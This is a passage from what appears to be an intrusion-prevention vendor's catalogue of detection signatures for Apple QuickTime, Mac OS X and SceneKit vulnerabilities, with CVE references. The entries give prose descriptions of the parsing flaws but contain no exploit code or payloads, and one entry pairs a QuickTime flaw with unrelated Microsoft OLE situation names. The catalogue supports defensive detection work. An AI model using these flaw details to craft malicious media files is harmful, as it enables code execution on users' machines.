Software: <os>
Type: Input Validation
Description: Improper processing of PSD files causes a buffer overflow vulnerability in Apple Mac OS X. A successful exploitation allows an attacker to execute code on the target system.
Situation: File-Binary_Apple-Mac OS X-ImageIO-Psd-File-Parsing-Heap-Buffer-Overflow-CVE-2024-40777
References:
CVE-2024-40777
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-40777
Back to top

Apple-OS-X-SceneKit-Buffer-Overflow-CVE-2015-3783

About this vulnerability: Apple OS X SceneKit Buffer Overflow
Risk: High
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-1296-5242
Platform: OS X
Software: Apple SceneKit
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Apple OS X SceneKit.
Situation: File-TextId_Apple-OS-X-SceneKit-Buffer-Overflow-CVE-2015-3783
References:
CVE-2015-3783
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3783
BID-76340
http://www.securityfocus.com/bid/76340
Back to top

Apple-Products-Sslverifysignedserverkeyexchange-Security-Feature-Bypass

About this vulnerability: A vulnerability in Apple Computer Apple TV
Risk: Moderate
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS X
Software: <os>
Type: Malfunction
Description: There exists a security feature bypass vulnerability in Apple products.
Situation: HTTPS_SS-Apple-Products-Sslverifysignedserverkeyexchange-Security-Feature-Bypass
Generic_TCP-Apple-Products-Sslverifysignedserverkeyexchange-Security-Feature-Bypass
References:
CVE-2014-1266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266
OSVDB-103583
http://www.osvdb.org/103583
Back to top

Apple-QTVR-Sample-Atoms-Movie-File-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in Apple Computer Quicktime
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Apple QuickTime. The flaw is due to boundary errors in the QuickTime Virtual Reality (QTVR) when processing QTVR movie files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted QTVR movie file. Successful exploitation may lead to arbitrary code execution in the security context of the logged in user. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user. In an attack case where code injection is not successful, if the affected Apple QuickTime process will terminate abnormally.
Situation: File-MPEG_Apple-QTVR-Sample-Atoms-Movie-File-Handling-Buffer-Overflow
References:
CVE-2007-4675
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4675
BID-26342
http://www.securityfocus.com/bid/26342
OSVDB-38545
http://www.osvdb.org/38545
Back to top

Apple-QuickDraw-GetSrcBits32ARGB-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Apple Mac OS X
Risk: Moderate
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS X
Software: <os>
Type: Malfunction
Description: There is a memory corruption vulnerability in the QuickDraw system component of Apple Mac OS X. A malicious PICT file may be used to corrupt memory. This may lead to code execution or denial of service.
Situation: HTTP_Apple-QuickDraw-GetSrcBits32ARGB-Memory-Corruption
File-Binary_Apple-QuickDraw-GetSrcBits32ARGB-Memory-Corruption
References:
CVE-2007-0462
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0462
BID-22207
http://www.securityfocus.com/bid/22207
OSVDB-32696
http://www.osvdb.org/32696
Back to top

Apple-QuickTime-ActiveX-Control-Clear-Method-Use-After-Free

About this vulnerability: A vulnerability in Apple Quicktime
Risk: Moderate
First detected in: sgpkg-ips-498-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Malfunction
Description: There is a use-after-free vulnerability in Apple QuickTime's ActiveX control. The vulnerability is due to an error while handling the Clear() method. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to view a maliciously crafted web page. This can lead to code execution in the context of the affected user. If code execution is unsuccessful, a denial of service condition may result.
Situation: File-Text_Apple-QuickTime-ActiveX-Control-Clear-Method-Use-After-Free
References:
CVE-2012-3754
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3754
BID-56438
http://www.securityfocus.com/bid/56438
OSVDB-87089
http://www.osvdb.org/87089
Back to top

Apple-QuickTime-Alis-Volume-Name-Parsing-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Apple Computer Quicktime
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been reported in Apple QuickTime. The vulnerability is due to insufficient validation of alis volume names in dref and rdrf atoms. A remote attacker can exploit this vulnerability by enticing an unsuspecting user to download and process a malicious QuickTime file. This can lead to code execution in the context of the affected application.
Situation: File-MPEG_Apple-QuickTime-Alis-Volume-Name-Parsing-Stack-Buffer-Overflow
References:
CVE-2013-1017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1017
BID-60097
http://www.securityfocus.com/bid/60097
OSVDB-93625
http://www.osvdb.org/93625
Back to top

Apple-QuickTime-And-iTunes-Heap-Memory-Corruption

About this vulnerability: A vulnerability in Apple Computer, Inc QuickTime
Risk: Moderate
First detected in: sgpkg-ips-355-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime; Apple iTunes
Type: Buffer Overflow
Description: A heap memory corruption vulnerability exists in Apple QuickTime and iTunes. The flaw may be exploited by delivering a crafted Apple QuickTime movie file to a target user and enticing the user to open it using the vulnerable product. The exploitation of this vulnerability may allow an attacker to inject and execute arbitrary code on the target host within the security context of the current user.
Situation: HTTP_SS-Apple-QuickTime-And-iTunes-Heap-Memory-Corruption
File-MPEG_Apple-QuickTime-And-iTunes-Heap-Memory-Corruption
References:
CVE-2005-4092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4092
BID-15732
http://www.securityfocus.com/bid/15732
Back to top

Apple-QuickTime-BMP-Handling-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability with BMP image handling in Apple QuickTime products
Risk: High
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: Apple QuickTime has a buffer overflow vulnerability in the handling of BMP images. An attacker is able to exploit this vulnerability to execute arbitrary code on the victim machine.
Situation: HTTP_Apple-QuickTime-BMP-Handling-Buffer-Overflow
E-Mail_BS-Apple-QuickTime-BMP-Handling-Buffer-Overflow
File-Binary_Apple-QuickTime-BMP-Handling-Buffer-Overflow
References:
CVE-2006-2238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2238
BID-17953
http://www.securityfocus.com/bid/17953
OSVDB-24820
http://www.osvdb.org/24820
Back to top

Apple-QuickTime-Color-Table-Id-Heap-Corruption

About this vulnerability: A heap corruption vulnerability in Apple QuickTime
Risk: Moderate
First detected in: sgpkg-ips-99-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Malfunction
Description: There is a heap memory corruption vulnerability in the Apple QuickTime product. The flaw is caused by insufficient checks when processing QTIF files. A remote attacker may exploit this vulnerability by enticing a target user to open a crafted QTIF file, thereby injecting and executing arbitrary code with the privileges of the currently logged-in user.
Situation: HTTP_Apple-QuickTime-Color-Table-Id-Heap-Corruption
File-MPEG_Apple-QuickTime-Color-Table-Id-Heap-Corruption
References:
CVE-2007-0718
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0718
BID-22827
http://www.securityfocus.com/bid/22827
Back to top

Apple-QuickTime-Crafted-HTTP-Error-Response-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Apple QuickTime
Risk: High
First detected in: sgpkg-ips-157-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Apple QuickTime. The flaw is due to improper boundary protection when handling HTTP error responses. A remote attacker can exploit this vulnerability by persuading the target user to visit a malicious server. Successful exploitation could allow for arbitrary code injection and execution with the privileges of the currently logged-on user.
Situation: HTTP_SLS-Apple-QuickTime-Crafted-HTTP-Error-Response-Buffer-Overflow
References:
CVE-2008-0234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0234
BID-27225
http://www.securityfocus.com/bid/27225
Back to top

Apple-QuickTime-Crgn-Atom-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Apple Computer QuickTime
Risk: Moderate
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Malfunction
Description: There exists a memory corruption vulnerability in Apple QuickTime application.
Situation: File-MPEG_Apple-QuickTime-Crgn-Atom-Parsing-Memory-Corruption
References:
CVE-2008-1017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1017
Back to top

Apple-QuickTime-Enof-Atom-Parsing-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Apple Computer Quicktime
Risk: Moderate
First detected in: sgpkg-ips-529-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Apple QuickTime. The vulnerability is due to improper validation of the size field of the enof atom in QuickTime movie files. A small enof size value can cause data to overflow into an adjacent buffer leading to a heap buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a maliciously crafted QuickTime movie file. This can lead to code execution in the context of the affected user. If code execution is unsuccessful, a denial of service condition may result.
Situation: File-MPEG_Apple-QuickTime-Enof-Atom-Parsing-Heap-Buffer-Overflow
References:
CVE-2013-0986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0986
OSVDB-93618
http://www.osvdb.org/93618
Back to top

Apple-QuickTime-FlashPix-File-Buffer-Overflow

About this vulnerability: A vulnerability in Apple Computer QuickTime
Risk: High
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Apple QuickTime. A remote attacker can exploit this vulnerability by enticing a user to view specially crafted FlashPix files. Successful exploitation of this vulnerability can lead to arbitrary code execution in the context of the current user. An unsuccessful code execution attempt can lead to abnormal termination of the vulnerable program.
Situation: HTTP_SS-Microsoft-OLE-Structured-Storage-Excessive-SAT-Size
File-OLE_Microsoft-Structured-Storage-Excessive-SAT-Size
References:
CVE-2009-2798
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2798
BID-36328
http://www.securityfocus.com/bid/36328
Back to top

Apple-QuickTime-FlashPix-Movie-File-Integer-Overflow

About this vulnerability: An integer overflow vulnerability in Apple Quicktime
Risk: High
First detected in: sgpkg-ips-300-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Mac OS X
Software: Apple QuickTime
Type: Integer Overflow
Description: There is an integer overflow vulnerability in Apple QuickTime. The vulnerability is due to an error when handling FlashPix encoded movie files. This vulnerability may be exploited by remote attackers by enticing a user to view specially crafted FlashPix file. Successful exploitation of this vulnerability can lead to arbitrary code execution in the context of the currently logged in user.
Situation: HTTP_SS-Apple-QuickTime-FlashPix-Movie-File-Integer-Overflow
File-OLE_Apple-QuickTime-FlashPix-Movie-File-Integer-Overflow
References:
CVE-2010-0519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0519
BID-39020
http://www.securityfocus.com/bid/39020
Back to top

Apple-QuickTime-Flic-Animation-File-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Apple QuickTime
Risk: Moderate
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: There is a heap buffer overflow in Apple QuickTime. A crafted FLIC animation file can be used to overflow a static buffer. This can lead to code execution in the privilege of the current user or denial of service.
Situation: HTTP_Apple-QuickTime-Flic-Animation-File-Buffer-Overflow
File-Binary_Apple-QuickTime-Flic-Animation-File-Buffer-Overflow
References:
CVE-2006-4384
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4384
BID-19976
http://www.securityfocus.com/bid/19976
OSVDB-28771
http://www.osvdb.org/28771
Back to top

Apple-QuickTime-FlipFileTypeAtomBton-Integer-Underflow

About this vulnerability: Interger underflow vulnerability in Apple QuickTime
Risk: High
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Integer Overflow
Description: There is a vulnerability in Apple QuickTime. The flaw is due to an integer underflow error in the "FlipFileTypeAtom_BtoN" function when processing crafted QuickTime media files. Successful exploitation allows remote attackers to execute arbitrary code under the context of the currently logged-in user.
Situation: HTTP_Apple-QuickTime-FlipFileTypeAtomBton-Integer-Underflow
File-MPEG_Apple-QuickTime-FlipFileTypeAtomBton-Integer-Underflow
References:
CVE-2007-2296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2296
BID-23652
http://www.securityfocus.com/bid/23652
OSVDB-35578
http://www.osvdb.org/35578
Back to top

Apple-QuickTime-FPX-File-Parsing-CVE-2016-1767-Memory-Corruption

About this vulnerability: A vulnerability in Apple Computer QuickTime
Risk: Moderate
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Malfunction
Description: There is a vulnerability caused by the improper parsing of Flashpix files in Apple Quicktime. Successful exploitation can allow an attacker to run arbitrary code on the target.
Situation: File-OLE_Apple-QuickTime-FPX-File-Parsing-CVE-2016-1767-Memory-Corruption
References:
CVE-2016-1767
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1767
Back to top

Apple-QuickTime-FPX-File-Parsing-CVE-2016-1768-Memory-Corruption

About this vulnerability: A vulnerability in Apple Computer QuickTime
Risk: Moderate
First detected in: sgpkg-ips-754-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Malfunction
Description: Improper parsing of FPX files in Quicktime causes a vulnerability, which when exploited, can be used to gain code execution privileges on the target system.
Situation: File-OLE_Apple-QuickTime-FPX-File-Parsing-CVE-2016-1768-Memory-Corruption
References:
CVE-2016-1768
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1768
Back to top

Apple-QuickTime-Ftab-Atom-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Apple Computer QuickTime
Risk: Moderate
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Apple QuickTime. The vulnerability is due to insufficient validation on the length of font names when parsing "ftab" atoms. A remote unauthenticated attacker can exploit this vulnerability by enticing the target user to open a specially crafted file with the affected application. Successful exploitation could result in arbitrary code execution in the context of the currently logged-in user.
Situation: File-MPEG_Apple-QuickTime-Ftab-Atom-Stack-Buffer-Overflow
References:
CVE-2014-1246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1246
OSVDB-103743
http://www.osvdb.org/103743
Back to top

Apple-QuickTime-Image-Description-Atom-Sign-Extension-Memory-Corruption

About this vulnerability: A vulnerability in Apple QuickTime
Risk: High
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS X
Software: Apple QuickTime
Type: Integer Overflow
Description: There exists a sign extension based memory corruption vulnerability in Apple QuickTime.
Situation: HTTP_SS-Apple-QuickTime-Image-Description-Atom-Sign-Extension-Memory-Corruption
File-MPEG_Apple-QuickTime-Image-Description-Atom-Sign-Extension
References:
CVE-2009-0955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0955
BID-35166
http://www.securityfocus.com/bid/35166
OSVDB-54874
http://www.osvdb.org/54874
Back to top

Apple-QuickTime-Image-Descriptor-Atom-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Apple QuickTime
Risk: High
First detected in: sgpkg-ips-142-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Malfunction
Description: There is a memory corruption vulnerability in the Apple QuickTime application. The vulnerability is due to improper checking of the Atom size field of the idsc atom in the QTIF image file. A remote attacker may exploit this vulnerability by providing a malicious QTIF image file to the target user, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-Apple-QuickTime-Image-Descriptor-Atom-Parsing-Memory-Corruption
File-MPEG_Apple-QuickTime-Image-Descriptor-Atom-Parsing-Memory-Corruption
References:
CVE-2008-0033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0033
BID-27299
http://www.securityfocus.com/bid/27299
Back to top

Apple-QuickTime-JPEG-2000-Cod-Length-Integer-Underflow

About this vulnerability: A vulnerability in Apple QuickTime
Risk: Moderate
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Malfunction
Description: There is a remote code execution vulnerability in Apple's QuickTime media player. The vulnerability is due to a memory corruption caused by insufficient validation of a JPEG 2000 COD marker segment's length value. The affected value is subtracted from, causing an underflow, before being used in a memory operation. A remote attacker could entice a target user to open a crafted JPEG 2000 file to exploit this vulnerability. A successful exploitation attempt could result in the execution of arbitrary code in the target user's security context.
Situation: File-JPEG_Apple-QuickTime-JPEG-2000-Cod-Length-Integer-Underflow
References:
CVE-2011-3250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3250
OSVDB-76543
http://www.osvdb.org/76543
Back to top

Apple-QuickTime-Media-Content

About this vulnerability: Download of Apple QuickTime media file
Risk: Low
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Insecure Configuration
Description: Apple QuickTime is a common media file format that carries video and audio content.
Situation: HTTP_SS-Apple-QuickTime-Media-Download
File-MPEG_Apple-QuickTime-Media
Back to top

Apple-QuickTime-Mjpeg-Frame-Stsd-Atom-Heap-Overflow

About this vulnerability: A vulnerability in Apple Computer Quicktime
Risk: Moderate
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: There is a heap overflow vulnerability in Apple Quicktime. The vulnerability is due to improper processing of mjpeg movies with an improper jpeg frame size in the stsd atom. This vulnerability can be exploited by a remote attacker by enticing the target user to open a specially crafted file with the affected application. Successful exploitation could result in arbitrary code execution in the context of the currently logged-in user.
Situation: File-MPEG_Apple-QuickTime-Mjpeg-Frame-Stsd-Atom-Heap-Overflow
References:
CVE-2013-1020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1020
BID-60108
http://www.securityfocus.com/bid/60108
OSVDB-93621
http://www.osvdb.org/93621
Back to top

Apple-QuickTime-Mov-File-Hreftrack-Cross-Zone-Scripting

About this vulnerability: A vulnerability in Apple QuickTime
Risk: Moderate
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-1555-5242
Platform: Generic
Software: Apple QuickTime
Type: Cross-site Scripting
Description: There is a vulnerability in the Apple QuickTime product that may allow cross zone scripting attacks. The flaw exists in the processing of MOV media files. A malicious user may exploit this vulnerability to execute arbitrary code or access local resources by enticing a remote user to open a malicious file.
Situation: HTTP_Apple-QuickTime-Mov-File-Hreftrack-Cross-Zone-Scripting
References:
CVE-2007-0059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0059
OSVDB-31164
http://www.osvdb.org/31164
Back to top

Apple-QuickTime-Mov-File-JVTCompEncodeFrame-Heap-Overflow

About this vulnerability: Heap overflow vulnerability in Apple QuickTime
Risk: High
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: There is a heap-based buffer overflow vulnerability in Apple QuickTime. The flaw is due to insufficient bounds checking in the "JVTCompEncodeFrame()" function when processing malformed MOV files. Successful exploitation allows remote attackers to execute arbitrary code under the context of the currently logged-in user.
Situation: HTTP_Apple-QuickTime-Mov-File-JVTCompEncodeFrame-Heap-Overflow
File-MPEG_Apple-QuickTime-Mov-File-JVTCompEncodeFrame-Heap-Overflow
References:
CVE-2007-2295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2295
BID-23650
http://www.securityfocus.com/bid/23650
OSVDB-35577
http://www.osvdb.org/35577
Back to top

Apple-QuickTime-Mov-File-String-Handling-Integer-Overflow

About this vulnerability: A vulnerability in Apple QuickTime
Risk: Moderate
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Integer Overflow
Description: There is a vulnerability in the way Apple QuickTime handles MOV media files. Specifically, the processing of crafted string values embedded in a MOV file is prone to a buffer overflow. This vulnerability may result in arbitrary code being injected and executed on the target host. In a successful attack, an attacker can inject code into the vulnerable target. The behavior of the target depends on the malicious code. In an unsuccessful attack, the vulnerable application may terminate as a result of the attack attempt. Note that any code executed by the attacker runs with the privileges of the logged in user.
Situation: File-MPEG_Apple-QuickTime-Mov-File-String-Handling-Integer-Overflow
References:
CVE-2005-2753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2753
BID-15306
http://www.securityfocus.com/bid/15306
OSVDB-20475
http://www.osvdb.org/20475
Back to top

Apple-QuickTime-Movie-File-Clipping-Region-Handling-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Apple QuickTime
Risk: Moderate
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Malfunction
Description: There exists a heap buffer overflow vulnerability in Apple QuickTime. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-MPEG_Apple-QuickTime-Movie-File-Clipping-Region-Handling-Heap-Buffer-Overflow
References:
CVE-2009-0954
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0954
Back to top

Apple-QuickTime-Movie-With-Embedded-Script

About this vulnerability: Apple QuickTime Movie file that contains embedded script
Risk: Low
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Cross-site Scripting
Description: An Apple QuickTime movie file can contain embedded scripts that are triggered during playback. This feature is included by design. However, it is a potential infection vector for malicious scripts.
Situation: HTTP_Apple-QuickTime-Movie-With-Embedded-Script
File-MPEG_Apple-QuickTime-Movie-With-Embedded-Script
Back to top

Apple-QuickTime-MP4-Absent-Stbl-Box-Memory-Corruption

About this vulnerability: A vulnerability in Apple Inc. QuickTime
Risk: Moderate
First detected in: sgpkg-ips-708-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Malfunction
Description: Arbitrary code can be executed by crafting an MP4 file that exploits a memory corruption vulnerability in QuickTime.
Situation: File-MPEG_Apple-QuickTime-MP4-Absent-Stbl-Box-Memory-Corruption
References:
CVE-2015-3667
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3667
Back to top

Apple-QuickTime-MPEG-Stream-Padding-Buffer-Overflow

About this vulnerability: A vulnerability in Apple QuickTime
Risk: High
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Apple QuickTime. The vulnerability is due to an integer underflow error which further leads to a heap-based buffer overflow when calculating the padding for an MPEG sample. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to download and process a specially crafted MPEG file with the vulnerable software. This can lead to code execution in the context of the vulnerable application.
Situation: File-MPEG_Apple-QuickTime-MPEG-Stream-Padding-Buffer-Overflow
References:
CVE-2012-0659
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0659
BID-53467
http://www.securityfocus.com/bid/53467
OSVDB-81931
http://www.osvdb.org/81931
Back to top

Apple-QuickTime-Pict-File-Processing-Memory-Corruption

About this vulnerability: A vulnerability in Apple Quicktime
Risk: High
First detected in: sgpkg-ips-461-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Malfunction
Description: There is a memory corruption vulnerability in Apple QuickTime. The vulnerability is due to the way that Apple QuickTime processes malformed PICT files. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to download and process a specially crafted PICT file. This could possibly lead to code execution in the security context of the currently logged on user.
Situation: File-Binary_Apple-QuickTime-Pict-File-Processing-Memory-Corruption
References:
CVE-2012-0671
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0671
BID-53584
http://www.securityfocus.com/bid/53584
OSVDB-81942
http://www.osvdb.org/81942
Back to top

Apple-QuickTime-Pict-Image-Paintpoly-Parsing-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Apple QuickTime
Risk: Moderate
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Apple QuickTime. The vulnerability is due to lack of boundary checks while processing paintPoly atoms embedded in PICT files. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted QuickTime image file. Successful exploitation may lead to arbitrary code execution in the security context of the logged in user. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user. In an attack case where code injection is not successful, the affected Apple QuickTime process will terminate abnormally.
Situation: HTTP_SS-Apple-QuickTime-Pict-Image-Paintpoly-Parsing-Heap-Buffer-Overflow
File-Binary_Apple-QuickTime-Pict-Image-Paintpoly-Parsing-Heap-Buffer-Overflow
References:
CVE-2009-0010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0010
BID-34938
http://www.securityfocus.com/bid/34938
Back to top

Apple-QuickTime-Player-Arbitrary-Code-Execution

About this vulnerability: An Apple QuickTime Player Arbitrary Code Execution vulnerability
Risk: High
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP SP3
Software: Apple QuickTime
Type: Code Injection
Description: A vulnerability in Apple QuickTime Player, versions 7.6.6 and 7.6.7, which allows remote attackers to execute arbitrary code via the Marshaled_pUnk attribute.
Situation: File-Text_Apple-QuickTime-Player-Arbitrary-Code-Execution
References:
CVE-2010-1818
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1818
OSVDB-67705
http://www.osvdb.org/67705
Back to top

Apple-QuickTime-Plugin-Content-Type-Buffer-Overflow

About this vulnerability: A vulnerability in Apple Computer Quicktime
Risk: High
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in Apple QuickTime. The vulnerability is due to insufficient bounds checking while parsing MIME types. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to process maliciously crafted MIME type information. This can lead to execution of arbitrary code in the context of the affected user. If code execution is unsuccessful, a denial of service condition may result.
Situation: HTTP_SHS-Apple-QuickTime-Plugin-Content-Type-Buffer-Overflow
References:
CVE-2012-3753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3753
BID-56438
http://www.securityfocus.com/bid/56438
Back to top

Apple-QuickTime-Plugin-Setlanguage-Buffer-Overflow

About this vulnerability: A vulnerability in Apple Computer QuickTime
Risk: Moderate
First detected in: sgpkg-ips-465-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Apple QuickTime. The vulnerability is due to insufficient bounds checking when parsing parameters to the IQTPluginControl::SetLanguage COM method inside the QuickTime plugin. This vulnerability can be exploited by a remote attacker by enticing the target user to open a specially crafted HTML page containing an embedded video with the affected application. Successful exploitation could result in arbitrary code injection and execution in the context of the currently logged-in user.
Situation: File-Text_Apple-QuickTime-Plugin-Setlanguage-Buffer-Overflow
References:
CVE-2012-0666
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0666
BID-53577
http://www.securityfocus.com/bid/53577
OSVDB-81937
http://www.osvdb.org/81937
Back to top

Apple-QuickTime-Psd-File-Parsing-CVE-2016-1769-Memory-Corruption

About this vulnerability: A vulnerability in Apple Computer Quicktime
Risk: Moderate
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple QuickTime
Type: Malfunction
Description: Apple QuickTime has a vulnerability which is caused by the improper parsing of PSD files. A successful exploitation will allow the attacker to run arbitrary code on the target.
Situation: File-Binary_Apple-QuickTime-Psd-File-Parsing-CVE-2016-1769-Memory-Corruption
References:
CVE-2016-1769
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1769
Back to top

Apple-QuickTime-Qtplugin-ActiveX-Control-Marshaled-Pointer

About this vulnerability: A vulnerability in Apple QuickTime
Risk: High
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Apple QuickTime
Type: Input Validation
Description: There is a code execution vulnerability in Apple QuickTime ActiveX control QTPlugin.ocx. The vulnerability is due to an input validation error while parsing the value of the _Marshaled_pUnk parameter. Remote attackers could exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation would result in arbitrary code injection and execution with the privileges of the logged in user.
Situation: HTTP_SS-Apple-QuickTime-Qtplugin-ActiveX-Control-Marshaled-Pointer
File-Text_Apple-QuickTime-Qtplugin-ActiveX-Control-Marshaled-Pointer
Back to top

Apple-QuickTime-QTPlugin.ocx-ActiveX-Vulnerable-Function-Call

About this vulnerability: Vulnerable function call against QuickTime player
Risk: Low
First detected in: sgpkg-ips-580-5211
